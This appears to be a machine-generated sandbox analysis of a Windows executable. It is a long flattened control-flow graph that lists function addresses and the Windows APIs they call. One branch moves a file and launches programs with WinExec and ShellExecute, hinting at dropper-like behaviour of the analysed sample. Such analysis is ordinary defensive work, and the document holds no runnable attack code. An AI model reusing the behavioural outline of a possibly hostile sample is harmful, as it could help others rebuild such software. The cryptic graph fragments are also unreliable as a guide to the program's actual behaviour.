408b9b 11338->11339 11340 408b44 GetCurrentThreadId Sleep 11339->11340 11341 408ba0 11340->11341 11341->11266 11343 532154 7 API calls 11342->11343 11344 5321ba 11343->11344 11344->11141 11346 40a8aa 11345->11346 11346->11059 11348 635b6c 11347->11348 11349 635bfd 11348->11349 11355 4246d0 11348->11355 11359 40eefc 11349->11359 11352 635c66 11375 409ddc 11352->11375 11354 635c86 11354->11074 11356 4246e0 11355->11356 11357 424701 11356->11357 11378 423398 11356->11378 11357->11348 11360 409ddc SysFreeString 11359->11360 11361 40ef24 11360->11361 11362 40ef7f 11361->11362 11383 40a800 11361->11383 11364 409ddc SysFreeString 11362->11364 11365 40ef94 11364->11365 11365->11352 11366 40ef3f 11389 40ed58 11366->11389 11369 40ef6c 11372 409ddc SysFreeString 11369->11372 11370 40ef5f 11371 40a800 4 API calls 11370->11371 11373 40ef6a 11371->11373 11372->11373 11396 40a1e8 11373->11396 11376 409df0 11375->11376 11377 409de2 SysFreeString 11375->11377 11376->11354 11377->11376 11379 42aa4c 71 API calls 11378->11379 11380 4233b1 11379->11380 11381 409410 4 API calls 11380->11381 11382 4233b6 11381->11382 11382->11357 11384 40a80d 11383->11384 11388 40a814 11383->11388 11403 409d7c 11384->11403 11412 40a650 11388->11412 11390 40ed6d 11389->11390 11395 40ed8a 11389->11395 11391 40edc8 11390->11391 11393 40ed75 11390->11393 11416 40f114 MultiByteToWideChar 11391->11416 11415 40f114 MultiByteToWideChar 11393->11415 11395->11369 11395->11370 11397 40a20f 11396->11397 11402 409d74 11396->11402 11397->11362 11398 409ddc 11399 409df0 11398->11399 11400 409de2 SysFreeString 11398->11400 11399->11362 11400->11399 11401 40a1ff SysReAllocStringLen 11401->11397 11401->11402 11402->11396 11402->11398 11402->11401 11404 409d90 11403->11404 11405 409d80 SysAllocStringLen 11403->11405 11404->11388 11405->11404 11406 409d74 11405->11406 11407 40a20f 11406->11407 11408 409ddc 11406->11408 11411 40a1ff SysReAllocStringLen 11406->11411 11407->11388 11409 409df0 11408->11409 11410 409de2 
SysFreeString 11408->11410 11409->11388 11410->11409 11411->11406 11411->11407 11413 40a656 SysFreeString 11412->11413 11414 40a65c 11412->11414 11413->11414 11414->11366 11415->11395 11416->11395 11418 639749 11417->11418 11439 63b124 11418->11439 11420 63982f 11445 60b774 11420->11445 11426 63986d 11500 42547c 11426->11500 11428 63989c 11429 42547c 5 API calls 11428->11429 11430 6398c6 11429->11430 11509 42d8fc 11430->11509 11432 6398d3 11433 639901 MoveFileW Sleep 11432->11433 11434 639926 11433->11434 11515 633bd8 11434->11515 11436 639942 11519 63586c Sleep WinExec Sleep 11436->11519 11438 639951 Sleep 11438->11082 11440 63b138 11439->11440 11520 4b5a8c 11440->11520 11442 63b185 11525 4b59a0 11442->11525 11444 63b1ce 11444->11420 11446 60b8e4 73 API calls 11445->11446 11447 60b78b 11446->11447 11448 60b79b 11447->11448 11452 42a97c 46 API calls 11447->11452 11449 4b5668 79 API calls 11448->11449 11450 60b7d4 11449->11450 11605 60b824 11450->11605 11454 60b7bf 11452->11454 11455 409410 4 API calls 11454->11455 11455->11448 11456 60c5bc 11457 60c5e4 11456->11457 11458 60c5cd 11456->11458 11459 60c603 11457->11459 11802 60bdbc 11457->11802 11460 42a97c 46 API calls 11458->11460 11464 60b8e4 11459->11464 11461 60c5df 11460->11461 11463 409410 4 API calls 11461->11463 11463->11457 11467 60b901 11464->11467 11465 60bd01 11466 43eb70 71 API calls 11465->11466 11468 60bd23 11466->11468 11467->11465 11469 60b96c 11467->11469 11475 60bb82 11467->11475 11468->11426 11470 40b08c 16 API calls 11469->11470 11471 60b999 11470->11471 11472 43d0d8 50 API calls 11471->11472 11473 60b9a4 11472->11473 11476 40b34c 25 API calls 11473->11476 11474 60bc02 12062 609788 11474->12062 11475->11474 11477 40c0c0 25 API calls 11475->11477 11478 60b9c1 11476->11478 11477->11474 11479 40b34c 25 API calls 11478->11479 11481 60b9d2 11479->11481 11483 40b08c 16 API calls 11481->11483 11485 60b9ed 11483->11485 11485->11426 11487 609748 46 API calls 11488 60bc70 11487->11488 11489 609748 46 API 
calls 11488->11489 11490 60bc87 11489->11490 11491 609748 46 API calls 11490->11491 11492 60bc9e 11491->11492 11493 609788 46 API calls 11492->11493 11494 60bcb4 11493->11494 11495 609788 46 API calls 11494->11495 11496 60bcca 11495->11496 11497 609748 46 API calls 11496->11497 11498 60bce1 11497->11498 11498->11465 12070 6096d0 11498->12070 11501 40a8a4 11500->11501 11502 425489 DeleteFileW 11501->11502 11503 4254d1 11502->11503 11504 42549b GetLastError GetFileAttributesW 11502->11504 11503->11428 11505 4254cb SetLastError 11504->11505 11506 4254ad 11504->11506 11505->11503 11506->11505 11507 4254b6 11506->11507 11508 4254bd RemoveDirectoryW 11507->11508 11508->11503 11510 42d911 11509->11510 11511 42d922 GetEnvironmentVariableW 11510->11511 11512 42d934 11511->11512 11513 42d941 11511->11513 11512->11432 11514 42d953 GetEnvironmentVariableW 11513->11514 11514->11512 11516 633bef 11515->11516 11517 633c23 ShellExecuteW 11516->11517 11518 633c4f 11517->11518 11518->11436 11519->11438 11528 4b5668 11520->11528 11522 4b5aa3 11532 4b5a3c 11522->11532 11524 4b5abe 11524->11442 11526 4b5668 79 API calls 11525->11526 11527 4b59ba 11526->11527 11527->11444 11529 4b5671 11528->11529 11536 4b56ac 11529->11536 11531 4b568d 11531->11522 11533 4b5a50 11532->11533 11534 4b5a86 11533->11534 11578 4b3e00 11533->11578 11534->11524 11537 4b56c7 11536->11537 11538 4b5772 11537->11538 11539 4b56f4 11537->11539 11574 424aa8 11538->11574 11559 424b00 11539->11559 11542 4b577c 11543 4257c8 2 API calls 11542->11543 11549 4b5770 11542->11549 11545 4b5797 GetLastError 11543->11545 11544 4b5711 11544->11549 11563 4257c8 11544->11563 11547 429308 2 API calls 11545->11547 11550 4b57b0 11547->11550 11548 4b5730 GetLastError 11569 429308 11548->11569 11549->11531 11552 42aa4c 71 API calls 11550->11552 11554 4b57d2 11552->11554 11553 4b5749 11555 42aa4c 71 API calls 11553->11555 11556 409410 4 API calls 11554->11556 11557 4b576b 11555->11557 11556->11549 11558 409410 4 API calls 11557->11558 
11558->11549 11560 424b16 11559->11560 11561 424b4e 11559->11561 11562 424b48 CreateFileW 11560->11562 11561->11544 11562->11561 11564 40a8a4 11563->11564 11565 4257e8 GetFullPathNameW 11564->11565 11566 4257fa 11565->11566 11567 425809 11565->11567 11566->11548 11567->11566 11568 42581e GetFullPathNameW 11567->11568 11568->11566 11570 429319 11569->11570 11571 42931f FormatMessageW 11569->11571 11570->11571 11572 429341 11571->11572 11573 429367 LocalFree 11572->11573 11573->11553 11575 424afc 11574->11575 11576 424abe 11574->11576 11575->11542 11576->11575 11577 424af6 CreateFileW 11576->11577 11577->11575 11579 4b3e1d 11578->11579 11584 4b3e3a 11579->11584 11587 42a97c 11579->11587 11581 4b3e75 11581->11534 11582 4b3e35 11583 409410 4 API calls 11582->11583 11583->11584 11584->11581 11585 42a97c 46 API calls 11584->11585 11586 409410 4 API calls 11584->11586 11585->11584 11586->11584 11588 42a983 11587->11588 11591 40f080 11588->11591 11590 42a99b 11590->11582 11592 40f088 11591->11592 11593 40f0d5 11592->11593 11596 40c4e0 11592->11596 11593->11590 11595 40f0c4 LoadStringW 11595->11593 11597 40c50d 11596->11597 11598 40c4ee 11596->11598 11597->11595 11598->11597 11601 40c498 11598->11601 11602 40c4c4 11601->11602 11603 40c4a8 GetModuleFileNameW 11601->11603 11602->11595 11604 40d70c 44 API calls 11603->11604 11604->11602 11606 60b8e4 73 API calls 11605->11606 11607 60b83a 11606->11607 11608 42a97c 46 API calls 11607->11608 11614 60b855 11607->11614 11609 60b850 11608->11609 11610 409410 4 API calls 11609->11610 11610->11614 11611 60b881 11612 60b7f1 11611->11612 11618 60a5c0 11611->11618 11612->11456 11614->11611 11615 42a97c 46 API calls 11614->11615 11616 60b87c 11615->11616 11617 409410 4 API calls 11616->11617 11617->11611 11619 60a5d9 11618->11619 11638 43eb70 11619->11638 11622 60a82b 11656 40b08c 11622->11656 11625 60a611 11627 42a97c 46 API calls 11625->11627 11633 60a62c 11625->11633 11628 60a627 11627->11628 11629 409410 4 API calls 11628->11629 
11629->11633 11630 42a97c 46 API calls 11630->11633 11631 609658 46 API calls 11631->11633 11632 409410 4 API calls 11632->11633 11633->11622 11633->11630 11633->11631 11633->11632 11634 609694 46 API calls 11633->11634 11635 40c0c0 25 API calls 11633->11635 11636 6095e0 46 API calls 11633->11636 11651 43eab8 11633->11651 11634->11633 11635->11633 11636->11633 11662 4410f0 11638->11662 11643 60b0ac 11644 60b0d9 11643->11644 11738 40c0c0 11644->11738 11646 60b312 11646->11625 11647 60b11b 11647->11646 11649 60b29c 11647->11649 11741 6095e0 11647->11741 11649->11646 11650 40c0c0 25 API calls 11649->11650 11650->11646 11745 43fcbc 11651->11745 11653 43eacf 11654 40b8f8 25 API calls 11653->11654 11655 43eafa 11654->11655 11655->11633 11657 40b0a2 11656->11657 11658 40b0bf 11656->11658 11657->11658 11659 40b0c1 11657->11659 11762 40b104 11657->11762 11658->11612 11659->11658 11775 40eb60 11659->11775 11663 441112 11662->11663 11664 4410fb 11662->11664 11668 440f44 25 API calls 11663->11668 11670 441131 11663->11670 11665 42a97c 46 API calls 11664->11665 11666 44110d 11665->11666 11667 409410 4 API calls 11666->11667 11667->11663 11668->11670 11669 43eb7c 11672 440f44 11669->11672 11670->11669 11675 43f238 11670->11675 11681 40be18 11672->11681 11674 43eb85 11674->11622 11674->11643 11676 43f250 11675->11676 11677 42a97c 46 API calls 11676->11677 11680 43f282 11676->11680 11678 43f27d 11677->11678 11679 409410 4 API calls 11678->11679 11679->11680 11680->11669 11682 40be56 11681->11682 11686 40be3b 11681->11686 11683 40bec4 11682->11683 11685 40bf91 11682->11685 11691 40bf2b 11683->11691 11692 40bdd4 11683->11692 11685->11691 11709 40b8f8 11685->11709 11686->11674 11688 40be18 25 API calls 11688->11691 11689 40bedc 11689->11691 11702 40b7d0 11689->11702 11691->11686 11691->11688 11713 41028c 11692->11713 11694 40bddd 11695 40bde5 11694->11695 11698 40bdf3 11694->11698 11696 41028c 4 API calls 11695->11696 11697 40bdea 11696->11697 11697->11689 11699 41028c 4 API calls 
11698->11699 11700 40be01 11699->11700 11701 41028c 4 API calls 11700->11701 11701->11697 11703 40b7ec 11702->11703 11704 40b830 11702->11704 11703->11704 11707 40b86a 11703->11707 11708 40b899 11703->11708 11704->11691 11705 40b7d0 25 API calls 11705->11707 11707->11704 11707->11705 11708->11704 11721 40b4f4 11708->11721 11710 40b901 11709->11710 11711 40b909 11709->11711 11728 40b6b8 11710->11728 11711->11691 11714 4102c1 TlsGetValue 11713->11714 11715 41029b 11713->11715 11716 4102a6 11714->11716 11717 4102cb 11714->11717 11715->11694 11718 4101c0 LocalAlloc TlsSetValue 11716->11718 11717->11694 11719 4102ab TlsGetValue 11718->11719 11720 4102ba 11719->11720 11720->11694 11722 40b693 11721->11722 11726 40b517 11721->11726 11722->11708 11723 40b7d0 25 API calls 11723->11726 11724 40b4f4 25 API calls 11724->11726 11725 40eb8c 25 API calls 11725->11726 11726->11722 11726->11723 11726->11724 11726->11725 11727 40eb60 14 API calls 11726->11727 11727->11726 11729 40b6cd 11728->11729 11732 40b6ea 11728->11732 11730 40b6d2 11729->11730 11731 40b71e 11729->11731 11730->11732 11734 40b75d 11730->11734 11737 40b6e1 11730->11737 11731->11732 11733 40a1e8 SysFreeString SysReAllocStringLen 11731->11733 11732->11711 11733->11731 11734->11732 11735 40b6b8 25 API calls 11734->11735 11735->11734 11736 40b34c 25 API calls 11736->11737 11737->11732 11737->11736 11739 40be18 25 API calls 11738->11739 11740 40c0ca 11739->11740 11740->11647 11742 6095f5 11741->11742 11743 609628 11742->11743 11744 42a97c 46 API calls 11742->11744 11743->11647 11744->11743 11746 43fccc 11745->11746 11747 43fcd5 11746->11747 11748 43fcdf 11746->11748 11753 43fc7c 11747->11753 11750 43fce8 11748->11750 11759 42a83c 11748->11759 11750->11653 11755 43fc90 11753->11755 11754 43fc9b 11757 440f44 25 API calls 11754->11757 11755->11754 11756 42a83c 4 API calls 11755->11756 11756->11755 11758 43fcb8 11757->11758 11758->11653 11760 409410 4 API calls 11759->11760 11761 42a846 11760->11761 11761->11750 11763 
40b10d 11762->11763 11768 40b13a 11762->11768 11764 40b12a 11763->11764 11765 40b16c 11763->11765 11763->11768 11764->11768 11772 40b132 11764->11772 11773 40b1af 11764->11773 11766 40b173 11765->11766 11767 40b17d 11765->11767 11769 409ddc SysFreeString 11766->11769 11779 409e54 11767->11779 11768->11657 11769->11768 11771 40b104 16 API calls 11771->11773 11772->11768 11774 40b08c 16 API calls 11772->11774 11773->11768 11773->11771 11774->11772 11776 40eb85 11775->11776 11777 40eb6b 11775->11777 11776->11659 11783 40eb2c 11777->11783 11781 409e5a 11779->11781 11780 409e60 SysFreeString 11780->11781 11781->11780 11782 409e72 11781->11782 11782->11768 11784 40eb30 11783->11784 11785 40eb3d 11783->11785 11787 40e80c 11784->11787 11785->11776 11788 40e8b8 11787->11788 11789 40e82c 11787->11789 11788->11785 11794 40e474 11789->11794 11791 40e854 11798 40e4dc 11791->11798 11795 40e487 11794->11795 11796 40e47d 11794->11796 11795->11791 11797 4089ac 13 API calls 11796->11797 11797->11795 11799 40e4e5 11798->11799 11800 40e4ec 11798->11800 11801 408b44 GetCurrentThreadId Sleep 11799->11801 11800->11785 11801->11800 11803 60be07 11802->11803 11804 40b08c 16 API calls 11803->11804 11805 60be86 11804->11805 11832 60ca14 11805->11832 11809 60beb5 11857 60b5cc 11809->11857 11811 60bedd 11812 60bee5 11811->11812 11813 60bf6c 11811->11813 11814 40b08c 16 API calls 11812->11814 11878 42c1dc 11813->11878 11816 60bf0a 11814->11816 11863 43d0d8 11816->11863 11817 60bf8d 11821 60bfa1 11817->11821 11822 60bfeb 11817->11822 11820 40b34c 25 API calls 11824 60bf38 11820->11824 11891 4fb5e8 11821->11891 11827 4fb5e8 50 API calls 11822->11827 11869 609f84 11824->11869 11826 60bf49 11828 40b08c 16 API calls 11826->11828 11831 60c02a 11827->11831 11830 60bf64 11828->11830 11829 60bfc3 11829->11457 11830->11457 11831->11457 11833 60ca40 11832->11833 11834 60ca8d 11833->11834 11835 42a97c 46 API calls 11833->11835 11836 42a97c 46 API calls 11834->11836 11839 60cab8 11834->11839 11837 60ca88 
11835->11837 11838 60cab3 11836->11838 11840 409410 4 API calls 11837->11840 11841 409410 4 API calls 11838->11841 11842 40b08c 16 API calls 11839->11842 11840->11834 11841->11839 11843 60cb1e 11842->11843 11844 43d0d8 50 API calls 11843->11844 11845 60cb29 11844->11845 11846 40b34c 25 API calls 11845->11846 11847 60cb46 11846->11847 11848 40b08c 16 API calls 11847->11848 11849 60be9e 11848->11849 11850 40b34c 11849->11850 11851 40b4db 11850->11851 11854 40b371 11850->11854 11851->11809 11853 40a1e8 2 API calls 11853->11854 11854->11851 11854->11853 11855 40b6b8 25 API calls 11854->11855 11856 40b34c 25 API calls 11854->11856 11903 40eb8c 11854->11903 11855->11854 11856->11854 11858 60b5e6 11857->11858 11862 60b67e 11858->11862 11963 431b00 11858->11963 11860 60b673 11967 431938 11860->11967 11862->11811 11864 43d0e0 11863->11864 11865 43d0fe 11864->11865 11866 42a97c 46 API calls 11864->11866 11865->11820 11867 43d0f9 11866->11867 11868 409410 4 API calls 11867->11868 11868->11865 11870 609fa0 11869->11870 11871 609fc3 11870->11871 11872 609fb4 11870->11872 11874 431828 52 API calls 11871->11874 12023 431828 11872->12023 11875 609fbe 11874->11875 11876 431938 71 API calls 11875->11876 11877 60a00a 11876->11877 11877->11826 11879 42c215 11878->11879 11884 42c2a0 11879->11884 11890 42c235 11879->11890 12029 423884 11879->12029 11883 42c26d 11883->11884 11885 423884 CharUpperBuffW 11883->11885 11886 42c38a 11884->11886 11889 42c2f8 11884->11889 11885->11884 11888 40c0c0 25 API calls 11886->11888 11886->11890 11888->11886 11889->11890 12037 42f984 11889->12037 11890->11817 11892 4fb612 11891->11892 11894 4fb620 11891->11894 11892->11829 11893 4fb680 12053 4fc074 11893->12053 11894->11892 11894->11893 11896 42a97c 46 API calls 11894->11896 11899 4fb65c 11894->11899 11897 4fb657 11896->11897 11898 409410 4 API calls 11897->11898 11898->11899 11899->11893 11900 42a97c 46 API calls 11899->11900 11901 4fb67b 11900->11901 11902 409410 4 API calls 11901->11902 11902->11893 
11904 40eb9e 11903->11904 11905 40eb60 14 API calls 11904->11905 11906 40ebb3 11905->11906 11909 40eaf4 11906->11909 11908 40ebca 11908->11854 11910 40eb27 11909->11910 11911 40eaff 11909->11911 11910->11908 11913 40e734 11911->11913 11914 40e750 11913->11914 11915 40e758 11913->11915 11925 40e5d0 11914->11925 11917 40e474 13 API calls 11915->11917 11918 40e780 11917->11918 11920 40e7c3 11918->11920 11936 40e53c 11918->11936 11921 40e4dc 2 API calls 11920->11921 11923 40e7e4 11921->11923 11923->11910 11926 40e685 11925->11926 11927 40e5e9 11925->11927 11926->11915 11928 40e5fa 11927->11928 11947 408850 11927->11947 11929 4089ac 13 API calls 11928->11929 11934 40e629 11929->11934 11931 40e658 11954 408b44 11931->11954 11934->11931 11951 40e460 11934->11951 11937 40e544 11936->11937 11938 40e54d 11937->11938 11959 40e00c 11937->11959 11940 40e2f0 11938->11940 11941 40e30a 11940->11941 11942 40e313 11941->11942 11944 40e32d 11941->11944 11943 40c0c0 25 API calls 11942->11943 11946 40e328 11943->11946 11945 40c0c0 25 API calls 11944->11945 11944->11946 11945->11946 11946->11920 11948 40885e 11947->11948 11949 408859 11947->11949 11948->11928 11950 408724 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11949->11950 11950->11948 11952 408850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11951->11952 11953 40e468 11952->11953 11953->11934 11955 408838 GetCurrentThreadId 11954->11955 11956 408b4f 11955->11956 11957 408ba4 Sleep 11956->11957 11958 408b7b 11956->11958 11957->11958 11958->11915 11960 40e017 11959->11960 11961 408850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11960->11961 11962 40e01e 11961->11962 11962->11938 11964 431b09 11963->11964 11966 431b15 11963->11966 11991 431f14 11964->11991 11966->11860 11969 431955 11967->11969 11968 431979 11970 4319a1 11968->11970 11972 42aa4c 71 
API calls 11968->11972 11969->11968 11971 42a97c 46 API calls 11969->11971 11973 4319c9 11970->11973 11974 42aa4c 71 API calls 11970->11974 11975 431974 11971->11975 11976 43199c 11972->11976 11978 4319fe 11973->11978 11982 42aa4c 71 API calls 11973->11982 11977 4319c4 11974->11977 11979 409410 4 API calls 11975->11979 11980 409410 4 API calls 11976->11980 11981 409410 4 API calls 11977->11981 12005 4311e8 11978->12005 11979->11968 11980->11970 11981->11973 11984 4319f9 11982->11984 11986 409410 4 API calls 11984->11986 11986->11978 11987 42a97c 46 API calls 11988 431a28 11987->11988 11990 409410 4 API calls 11988->11990 11989 431a2d 11989->11862 11990->11989 11992 431f1a 11991->11992 11995 431bfc 11992->11995 11994 431f38 11994->11966 11996 431c08 11995->11996 11997 431c22 11996->11997 11998 431c18 GetACP 11996->11998 11999 431c25 GetCPInfo 11997->11999 11998->11999 12000 431c42 11999->12000 12001 431c59 11999->12001 12002 42a97c 46 API calls 12000->12002 12001->11994 12003 431c54 12002->12003 12004 409410 4 API calls 12003->12004 12004->12001 12006 431214 12005->12006 12007 4311f9 12005->12007 12008 431241 12006->12008 12010 42aa4c 71 API calls 12006->12010 12007->12006 12009 42a97c 46 API calls 12007->12009 12013 42aa4c 71 API calls 12008->12013 12014 431269 12008->12014 12011 43120f 12009->12011 12012 43123c 12010->12012 12016 409410 4 API calls 12011->12016 12017 409410 4 API calls 12012->12017 12018 431264 12013->12018 12015 43129f 12014->12015 12019 42aa4c 71 API calls 12014->12019 12015->11987 12015->11989 12016->12006 12017->12008 12020 409410 4 API calls 12018->12020 12021 43129a 12019->12021 12020->12014 12022 409410 4 API calls 12021->12022 12022->12015 12024 431842 12023->12024 12025 431832 12023->12025 12024->11875 12026 431f14 52 API calls 12025->12026 12028 431840 12025->12028 12027 431875 12026->12027 12027->11875 12028->11875 12031 423893 12029->12031 12030 4238b4 12033 4238b8 12030->12033 12031->12030 12032 4238ae CharUpperBuffW 12031->12032 
12032->12030 12034 4238c5 12033->12034 12035 4238f0 12034->12035 12036 4238ea CharLowerBuffW 12034->12036 12035->11883 12036->12035 12040 42fb00 12037->12040 12043 42f9a8 12040->12043 12044 42f9d3 12043->12044 12045 42f9ba 12043->12045 12046 42fa5c CompareStringW 12044->12046 12049 42fa5c 12045->12049 12048 42f9a1 12046->12048 12048->11889 12050 42fa75 12049->12050 12051 42facf CompareStringW 12050->12051 12052 42fa97 12050->12052 12051->12052 12052->12048 12056 4fbb44 12053->12056 12055 4fc07b 12055->11892 12057 4fbb58 12056->12057 12061 4fbb82 12056->12061 12058 42a97c 46 API calls 12057->12058 12057->12061 12059 4fbb7d 12058->12059 12060 409410 4 API calls 12059->12060 12060->12061 12061->12055 12063 6097a1 12062->12063 12064 6097ba 12063->12064 12065 42a97c 46 API calls 12063->12065 12066 609748 12064->12066 12065->12064 12067 609762 12066->12067 12068 60977b 12067->12068 12069 42a97c 46 API calls 12067->12069 12068->11487 12069->12068 12071 6096e5 12070->12071 12072 609719 12071->12072 12073 42a97c 46 API calls 12071->12073 12072->11465 12073->12072 12074 405968 12075 405980 12074->12075 12076 405bc8 12074->12076 12085 405992 12075->12085 12090 405a1d Sleep 12075->12090 12077 405ce0 12076->12077 12078 405b8c 12076->12078 12079 405714 VirtualAlloc 12077->12079 12080 405ce9 12077->12080 12086 405ba6 Sleep 12078->12086 12088 405be6 12078->12088 12082 40574f 12079->12082 12083 40573f 12079->12083 12081 4059a1 12098 4056c8 12083->12098 12084 405a80 12097 405a8c 12084->12097 12103 40564c 12084->12103 12085->12081 12085->12084 12091 405a61 Sleep 12085->12091 12086->12088 12089 405bbc Sleep 12086->12089 12092 40564c VirtualAlloc 12088->12092 12096 405c04 12088->12096 12089->12078 12090->12085 12093 405a33 Sleep 12090->12093 12091->12084 12095 405a77 Sleep 12091->12095 12092->12096 12093->12075 12095->12085 12099 405710 12098->12099 12100 4056d1 12098->12100 12099->12082 12100->12099 12101 4056dc Sleep 12100->12101 12101->12099 12102 4056f6 Sleep 12101->12102 
12102->12100 12107 4055e0 12103->12107 12105 405655 VirtualAlloc 12106 40566c 12105->12106 12106->12097 12108 405580 12107->12108 12108->12105 12109 40c498 12110 40c4c4 12109->12110 12111 40c4a8 GetModuleFileNameW 12109->12111 12113 40d70c GetModuleFileNameW 12111->12113 12114 40d75a 12113->12114 12119 40d5e8 12114->12119 12116 40d786 12117 40d798 LoadLibraryExW 12116->12117 12118 40d7a0 12116->12118 12117->12118 12118->12110 12121 40d609 12119->12121 12120 40d691 12120->12116 12121->12120 12137 40d324 12121->12137 12123 40d67e 12124 40d693 GetUserDefaultUILanguage 12123->12124 12125 40d684 12123->12125 12141 40ccd4 EnterCriticalSection 12124->12141 12126 40d450 2 API calls 12125->12126 12126->12120 12128 40d6a0 12161 40d450 12128->12161 12130 40d6ad 12131 40d6d5 12130->12131 12132 40d6bb GetSystemDefaultUILanguage 12130->12132 12131->12120 12165 40d51c 12131->12165 12133 40ccd4 17 API calls 12132->12133 12135 40d6c8 12133->12135 12136 40d450 2 API calls 12135->12136 12136->12131 12138 40d346 12137->12138 12140 40d350 12137->12140 12173 40d008 12138->12173 12140->12123 12142 40cd20 LeaveCriticalSection 12141->12142 12143 40cd00 12141->12143 12210 409d94 12142->12210 12146 40cd11 LeaveCriticalSection 12143->12146 12145 40cd31 IsValidLocale 12147 40cd40 12145->12147 12148 40cd8f EnterCriticalSection 12145->12148 12156 40cdc2 12146->12156 12150 40cd54 12147->12150 12151 40cd49 12147->12151 12149 40cda7 12148->12149 12157 40cdb8 LeaveCriticalSection 12149->12157 12225 40c9bc 12150->12225 12212 40cbb8 GetThreadUILanguage 12151->12212 12154 40cd52 12154->12148 12155 40cd5d GetSystemDefaultUILanguage 12155->12148 12158 40cd67 12155->12158 12156->12128 12157->12156 12159 40cd78 GetSystemDefaultUILanguage 12158->12159 12160 40c9bc 3 API calls 12159->12160 12160->12154 12163 40d46e 12161->12163 12162 40d4e9 12162->12130 12163->12162 12234 40d3e4 12163->12234 12239 409e78 12165->12239 12168 40d56c 12169 40d3e4 2 API calls 12168->12169 12170 40d580 12169->12170 12171 40d5ae 
12170->12171 12172 40d3e4 2 API calls 12170->12172 12171->12120 12172->12171 12174 40d01f 12173->12174 12175 40d033 GetModuleFileNameW 12174->12175 12176 40d048 12174->12176 12175->12176 12177 40d070 RegOpenKeyExW 12176->12177 12182 40d217 12176->12182 12178 40d131 12177->12178 12179 40d097 RegOpenKeyExW 12177->12179 12194 40ce18 GetModuleHandleW 12178->12194 12179->12178 12180 40d0b5 RegOpenKeyExW 12179->12180 12180->12178 12183 40d0d3 RegOpenKeyExW 12180->12183 12182->12140 12183->12178 12185 40d0f1 RegOpenKeyExW 12183->12185 12184 40d14f RegQueryValueExW 12186 40d1a0 RegQueryValueExW 12184->12186 12189 40d16d 12184->12189 12185->12178 12188 40d10f RegOpenKeyExW 12185->12188 12187 40d1bc 12186->12187 12191 40d19e 12186->12191 12192 40d1c4 RegQueryValueExW 12187->12192 12188->12178 12188->12182 12190 40d175 RegQueryValueExW 12189->12190 12190->12191 12193 40d206 RegCloseKey 12191->12193 12192->12191 12193->12140 12195 40ce40 GetProcAddress 12194->12195 12196 40ce51 12194->12196 12195->12196 12197 40ce67 12196->12197 12202 40ceb3 12196->12202 12206 40cdf4 12196->12206 12197->12184 12200 40cdf4 CharNextW 12200->12202 12201 40cdf4 CharNextW 12201->12202 12202->12197 12202->12201 12203 40cf38 FindFirstFileW 12202->12203 12205 40cfa2 lstrlenW 12202->12205 12203->12197 12204 40cf54 FindClose lstrlenW 12203->12204 12204->12197 12204->12202 12205->12202 12208 40ce02 12206->12208 12207 40ce10 12207->12197 12207->12200 12208->12207 12209 40cdfa CharNextW 12208->12209 12209->12208 12211 409d9a 12210->12211 12211->12145 12213 40cbd4 12212->12213 12214 40cc2d 12212->12214 12230 40cb74 GetThreadPreferredUILanguages 12213->12230 12215 40cb74 2 API calls 12214->12215 12220 40cc35 12215->12220 12219 40cc7c SetThreadPreferredUILanguages 12221 40cb74 2 API calls 12219->12221 12220->12219 12224 40ccbd 12220->12224 12222 40cc92 12221->12222 12223 40ccad SetThreadPreferredUILanguages 12222->12223 12222->12224 12223->12224 12224->12154 12227 40c9f7 12225->12227 12226 40ca60 
IsValidLocale 12228 40ca73 GetLocaleInfoW GetLocaleInfoW 12226->12228 12229 40caae 12226->12229 12227->12226 12227->12229 12228->12229 12229->12155 12231 40cb95 12230->12231 12232 40cbae SetThreadPreferredUILanguages 12230->12232 12233 40cb9e GetThreadPreferredUILanguages 12231->12233 12232->12214 12233->12232 12235 40d3f9 12234->12235 12236 40d416 FindFirstFileW 12235->12236 12237 40d426 FindClose 12236->12237 12238 40d42c 12236->12238 12237->12238 12238->12163 12240 409e7c GetUserDefaultUILanguage GetLocaleInfoW 12239->12240 12240->12168 12241 5edea4 PeekMessageW 12242 5edfa6 12241->12242 12243 5edec5 12241->12243 12244 5edecb IsWindowUnicode 12243->12244 12245 5eded5 12243->12245 12244->12245 12246 5edefc PeekMessageA 12245->12246 12247 5edee6 PeekMessageW 12245->12247 12248 5edf10 12246->12248 12247->12248 12248->12242 12249 5efd40 9 API calls 12248->12249 12250 5edf4b 12249->12250 12250->12242 12251 5edd38 121 API calls 12250->12251 12252 5edf58 12251->12252 12252->12242 12253 5edbf0 TranslateMDISysAccel 12252->12253 12254 5edf6b 12253->12254 12254->12242 12255 5edc40 15 API calls 12254->12255 12256 5edf78 12255->12256 12256->12242 12257 5edba8 3 API calls 12256->12257 12258 5edf85 12257->12258 12258->12242 12259 5edf89 TranslateMessage 12258->12259 12260 5edf9e DispatchMessageA 12259->12260 12261 5edf96 DispatchMessageW 12259->12261 12260->12242 12261->12242 12262 407cfb 12267 407c54 12262->12267 12264 407d1f 12265 407d40 CompareStringW 12264->12265 12266 407d61 12265->12266 12270 40f034 12267->12270 12273 40efa4 12270->12273 12272 407c66 12272->12264 12274 40efc5 12273->12274 12275 40ed58 MultiByteToWideChar 12274->12275 12276 40efeb 12274->12276 12275->12276 12276->12272 12277 63c7a8 12278 63c7b6 12277->12278 12290 5ee0e8 12278->12290 12280 63c7cf 12281 5ee0e8 10 API calls 12280->12281 12282 63c7e2 12281->12282 12283 5ee0e8 10 API calls 12282->12283 12284 63c7f5 12283->12284 12285 5ee0e8 10 API calls 12284->12285 12286 63c808 12285->12286 12296 5ee244 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(?), ref: 006337C2
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00633830,?,00000000,00633855,?,?,?,?), ref: 006337D1
                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 006337F3
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00633805
                                                                    • CloseHandle.KERNEL32(?,00000001,?,00000000,000000FF,000004FF,00000001,?,00000000,000000FF,000004FF,?,000000FF,00000000,00633830), ref: 00633815
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
